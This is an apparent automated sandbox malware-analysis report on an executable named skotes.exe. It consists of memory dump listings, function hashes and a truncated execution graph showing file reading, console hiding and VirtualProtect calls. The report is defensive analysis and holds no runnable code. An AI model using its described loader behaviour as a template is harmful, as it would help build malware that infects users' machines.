                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              • API String ID: 0-2895844383
                                                                                                                                                                                                                                              • Opcode ID: 23ce5c275d4ad3b32947e265025ef0789d0347fa73929b283d1f42450b2fd165
                                                                                                                                                                                                                                              • Instruction ID: c4a268b77bffdf533ef66f97e109169aaa7b9af8f848d6f366f3d72e29ca67a3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23ce5c275d4ad3b32947e265025ef0789d0347fa73929b283d1f42450b2fd165
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2121D171644219BFEB34AF659C80E6BB3ADEF003A8B144A15F928871D1E7B1ED00E760
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00C01764
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C017AF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: pContext
                                                                                                                                                                                                                                              • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                              • Opcode ID: f6b310bbb61523e7e9834c7787dd15418b72bbe68ea76a5205d2d414dd3064dd
                                                                                                                                                                                                                                              • Instruction ID: 3adbd5c57f580860ef9f2be40e250ebfc1a7c929c2e58e63e54566126a12bdd4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6b310bbb61523e7e9834c7787dd15418b72bbe68ea76a5205d2d414dd3064dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1011D636A102149BCB15EF5CC48556DB7A9AF84760B194065ED12A73C2DB74DE05CBD0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00BFB94E
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BFB961
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: pContext
                                                                                                                                                                                                                                              • API String ID: 548886458-2046700901
                                                                                                                                                                                                                                              • Opcode ID: 527e707a7b099a4c64e3f6a495f419ddf2a1fdb87ee8c355832fd349507f032e
                                                                                                                                                                                                                                              • Instruction ID: bf3dee95e7f86127e7876e74af89315e7bd6c0dea9d74af709b6c94de75fba6f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 527e707a7b099a4c64e3f6a495f419ddf2a1fdb87ee8c355832fd349507f032e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E0D839B00218ABCB04F765E849D9DBBBD9EC47147144166EA11E3391EB74EA06CAD4
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF34FC
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                              • String ID: pScheduler$version
                                                                                                                                                                                                                                              • API String ID: 2141394445-3154422776
                                                                                                                                                                                                                                              • Opcode ID: ca53ca5669bb4ac127116b644c2258c7b808b1741e8e09db67d0a3cb84529edf
                                                                                                                                                                                                                                              • Instruction ID: 2d91e3362289605cf34565df22f1d445a73a8c90526c654ea6bc82a2f8394a9e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca53ca5669bb4ac127116b644c2258c7b808b1741e8e09db67d0a3cb84529edf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0E04F2484020CB6CB25FA65D887AE877E8DB10B09F04C171BA10621D29BB5978CDA91

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:3.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:1.6%
                                                                                                                                                                                                                                              Signature Coverage:2.6%
                                                                                                                                                                                                                                              Total number of Nodes:576
                                                                                                                                                                                                                                              Total number of Limit Nodes:10
                                                                                                                                                                                                                                              execution_graph 20952 23432b 39 API calls _unexpected 20954 22e32b 71 API calls 3 library calls 20955 22e52b 21 API calls CallUnexpected 20879 22ea29 54 API calls 2 library calls 20881 222c30 14 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 20885 23c835 LeaveCriticalSection std::_Lockit::~_Lockit 20958 23e13b 43 API calls 2 library calls 20959 24913f 20 API calls 20960 22e13c GetModuleHandleW GetProcAddress GetProcAddress 20961 249b05 IsProcessorFeaturePresent 20886 22ee00 40 API calls 5 library calls 20962 229500 49 API calls 3 library calls 20963 221f00 111 API calls 2 library calls 20966 229709 77 API calls std::ios_base::_Init 20890 246015 49 API calls 20893 22b011 31 API calls 20967 22c311 43 API calls _Ungetc 20973 231b63 66 API calls 20975 222f60 20 API calls 2 library calls 20979 22e572 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 20565 221b70 GetPEB 20589 221000 20565->20589 20568 221ea6 20570 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20568->20570 20569 221bdc GetFileSize 20571 221e82 CloseHandle 20569->20571 20572 221bf0 20569->20572 20573 221eb4 20570->20573 20571->20568 20574 221bf8 ReadFile 20572->20574 20575 221c15 CloseHandle 20574->20575 20576 221e79 20574->20576 20577 221e8b 20575->20577 20588 221c30 std::ios_base::_Ios_base_dtor _Yarn _strlen 20575->20588 20576->20571 20600 221ab0 20577->20600 20579 221ebe 20612 2234f0 30 API calls std::_Throw_Cpp_error 20579->20612 20581 221ec3 20613 23690c 29 API calls 2 library calls 20581->20613 20583 2297fb RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20583->20588 20588->20577 20588->20579 20588->20581 20588->20583 20590 22102d std::ios_base::_Ios_base_dtor _Yarn _strlen 20589->20590 20599 221290 20589->20599 20593 2212b3 20590->20593 20595 2212b8 20590->20595 20596 2297fb RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20590->20596 20590->20599 20591 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20592 2212a9 CreateFileA 20591->20592 20592->20568 20592->20569 20614 2234f0 30 API calls std::_Throw_Cpp_error 20593->20614 20615 23690c 29 API calls 2 library calls 20595->20615 20596->20590 20599->20591 20601 221000 30 API calls 20600->20601 20602 221ad8 FreeConsole 20601->20602 20616 2212c0 20602->20616 20605 2212c0 78 API calls 20606 221b0a 20605->20606 20607 221000 30 API calls 20606->20607 20608 221b1d VirtualProtect 20607->20608 20609 221b36 20608->20609 20610 22986f __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20609->20610 20611 221b40 20610->20611 20611->20568 20617 